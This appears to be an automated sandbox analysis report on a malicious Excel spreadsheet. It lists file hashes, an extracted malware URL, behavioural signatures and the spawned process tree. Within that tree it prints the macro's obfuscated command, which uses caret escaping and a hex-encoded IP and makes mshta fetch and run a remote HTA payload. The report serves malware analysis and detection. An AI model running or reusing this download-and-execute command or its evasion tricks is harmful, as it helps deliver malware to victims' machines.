Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
20-11-2024 18:40
Behavioral task
behavioral1
Sample
cc5c36c738c206cfc834c632e359739f4cbde4c34607363f337df35987af751f.xls
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
cc5c36c738c206cfc834c632e359739f4cbde4c34607363f337df35987af751f.xls
Resource
win10v2004-20241007-en
General
-
Target
cc5c36c738c206cfc834c632e359739f4cbde4c34607363f337df35987af751f.xls
-
Size
114KB
-
MD5
449a2e43961640dc6331c4747bc108cb
-
SHA1
4ef0b29acf8537bd0e13792537acb300446f26e5
-
SHA256
cc5c36c738c206cfc834c632e359739f4cbde4c34607363f337df35987af751f
-
SHA512
6ebf2bc7ab872687cd034f93da26a609c9fa95b031d476becf0129e992bf4f8dc2a2ca483edc1c02105b63ae39525b5f9508718e47253fd57e071dce770dcf7d
-
SSDEEP
3072:yW+nBqmsk3hbdlylKsgqopeJBWhZFGkE+cMLxAAIXxe53lGvFTQ3IzxgdrvxpU0S:t+nBqmsk3hbdlylKsgqopeJBWhZFVE+S
Malware Config
Extracted
http://185.7.214.7/fer/fe5.html
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4060 4948 cmd.exe 81 -
Blocklisted process makes network request 1 IoCs
flow pid Process 25 4840 mshta.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4060 cmd.exe 996 PING.EXE -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE -
Delays execution with timeout.exe 1 IoCs
pid Process 3276 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 996 PING.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4948 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 14 IoCs
pid Process 4948 EXCEL.EXE 4948 EXCEL.EXE 4948 EXCEL.EXE 4948 EXCEL.EXE 4948 EXCEL.EXE 4948 EXCEL.EXE 4948 EXCEL.EXE 4948 EXCEL.EXE 4948 EXCEL.EXE 4948 EXCEL.EXE 4948 EXCEL.EXE 4948 EXCEL.EXE 4948 EXCEL.EXE 4948 EXCEL.EXE -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 4948 wrote to memory of 4060 4948 EXCEL.EXE 86 PID 4948 wrote to memory of 4060 4948 EXCEL.EXE 86 PID 4060 wrote to memory of 996 4060 cmd.exe 88 PID 4060 wrote to memory of 996 4060 cmd.exe 88 PID 4060 wrote to memory of 3276 4060 cmd.exe 92 PID 4060 wrote to memory of 3276 4060 cmd.exe 92 PID 4060 wrote to memory of 4840 4060 cmd.exe 94 PID 4060 wrote to memory of 4840 4060 cmd.exe 94
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\cc5c36c738c206cfc834c632e359739f4cbde4c34607363f337df35987af751f.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4948 -
C:\Windows\SYSTEM32\cmd.execmd /c ping google.com && timeout 4 && start ms^h^ta ht^tp:/^/0x^b^907d60^7/fe^r/f^e5.h^tm^l2⤵
- Process spawned unexpected child process
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:4060 -
C:\Windows\system32\PING.EXEping google.com3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:996
-
-
C:\Windows\system32\timeout.exetimeout 43⤵
- Delays execution with timeout.exe
PID:3276
-
-
C:\Windows\system32\mshta.exemshta http://0xb907d607/fer/fe5.html3⤵
- Blocklisted process makes network request
PID:4840
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize1KB
MD50909e1a6bc5a7c3c4d36cf8062d65bf7
SHA1ef5dc65ad8ae620585a0db65769bbd2f88a7d750
SHA256b5443138a2056a0be909eeba4f92a0b15b710eaa0660e67fd3ca24bba11fb0ca
SHA51255ef9b10bea464bb91e5f3d0466ea8795cdd8c105b5a9b4f10c2ee398410a97630646ffa85e77cdc612e8639a94ed52da4b2c696fc9655ac9e265e2c6eac797c